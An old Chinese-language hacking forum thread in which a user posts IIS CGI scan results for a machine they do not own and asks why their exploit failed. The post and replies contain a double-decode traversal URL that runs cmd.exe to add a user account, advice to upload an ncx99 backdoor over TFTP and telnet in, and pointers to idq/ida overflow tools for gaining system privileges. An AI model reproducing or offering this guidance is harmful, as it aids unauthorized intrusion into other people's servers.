20CN网络安全小组第一代论坛
发表新主题  发表回复

个人资料 | 社区目录 用户登录 | | 论坛搜索 | 常见问题 | 论坛主页
  下一个最老的主题   下一个最新的主题
» 20CN网络安全小组第一代论坛   » 电 脑 技 术   » 电脑门诊   » 扫瞄到一台机器,CGI漏洞如下,高手指点一二看小弟哪里不对

   
作者 标题: 扫瞄到一台机器,CGI漏洞如下,高手指点一二看小弟哪里不对
14279095
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
扫瞄到一台机器,CGI漏洞如下
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\ (HTTP: 200 )

/scripts/samples/search/simple.idq (HTTP: 200 )

/scripts/samples/search/queryhit.idq (HTTP: 200 )

/scripts/samples/search/query.idq (HTTP: 200 )

/scripts/samples/search/filetime.idq (HTTP: 200 )

/scripts/samples/search/filesize.idq (HTTP: 200 )

/scripts/samples/search/author.idq (HTTP: 200 )

/scripts/samples/search/qsumrhit.htw (HTTP: 200 )

/scripts/samples/search/qfullhit.htw (HTTP: 200 )

/iissamples/issamples/query.idq (HTTP: 200 )

/iissamples/issamples/oop/qsumrhit.htw (HTTP: 200 )

/iissamples/issamples/fastq.idq (HTTP: 200 )

/iissamples/issamples/oop/qfullhit.htw (HTTP: 200 )

/iissamples/exair/search/search.idq (HTTP: 200 )

/iissamples/exair/search/query.idq (HTTP: 200 )

/iissamples/exair/search/qsumrhit.htw (HTTP: 200 )

/iissamples/exair/search/qfullhit.htw (HTTP: 200 )

/iishelp/iis/misc/iirturnh.htw (HTTP: 200 )

/blabla.idq (HTTP: 200 )

/abczxv.htw (HTTP: 200 )

/?PageServices (HTTP: 200 )

/*.idq (HTTP: 200 )

/*.ida (HTTP: 200 )

我用添加命令如下
/ip//scripts/..%255c../winnt/system32/cmd.exe?/c+net+user+aa+aa+/add
结果显示如下
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
请问各位高手我错在哪里帮我解一下这题

IP: 已记录
DevilDragon
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
有二次解码,/?PageServices 这个可以利用,别的就没有用了。

------------------
爱,是多彩生活的调色板;爱,是一切生命的源泉;爱是多彩鲜花的芬芳;爱,是。。。。。。

IP: 已记录
14279095
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
有的话怎么利用,请告诉我,这是台老美的机器,不搞白不搞。:)
IP: 已记录
流星红
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
第一个难道不可用!
IP: 已记录
流星红
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
想这样添加帐号,不可能吧!
先上传一个后门,如ncx99(我喜欢用TFTP上传)
然后telnet99后就可以添加帐号了。
IP: 已记录
TomyChen
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
如果*.ida没有打补丁的话也是有用的!
而且是最有用的。
两分种可以搞到system权
IP: 已记录
DevilDragon
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
/scripts/samples/search/simple.idq 这个你到大鹰的主页上下个溢出的程序就行了,就能用,最后好像是root吧。
IP: 已记录
许哲
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\ 你可以用这个东东穿个什么什么之类的木马上去~~嘿嘿~~而且有IDQ益出~http://home.luzhou.net/hujixing/idq.exe用这个可以提升你的用户权限~ 前提是已经传了什么什么什么之类的木马上去~OK?
IP: 已记录

 
发表新主题  发表回复 关闭主题 突出主题 移动主题 删除主题 下一个最老的主题   下一个最新的主题
- 适于打印的主题视图
转到:
联系我们 | 20CN网络安全小组

Powered by Infopop Corporation
UBB.classic™ 6.5.0
NetDemon修改版 1.5.0, 20CN网络安全小组 版权所有。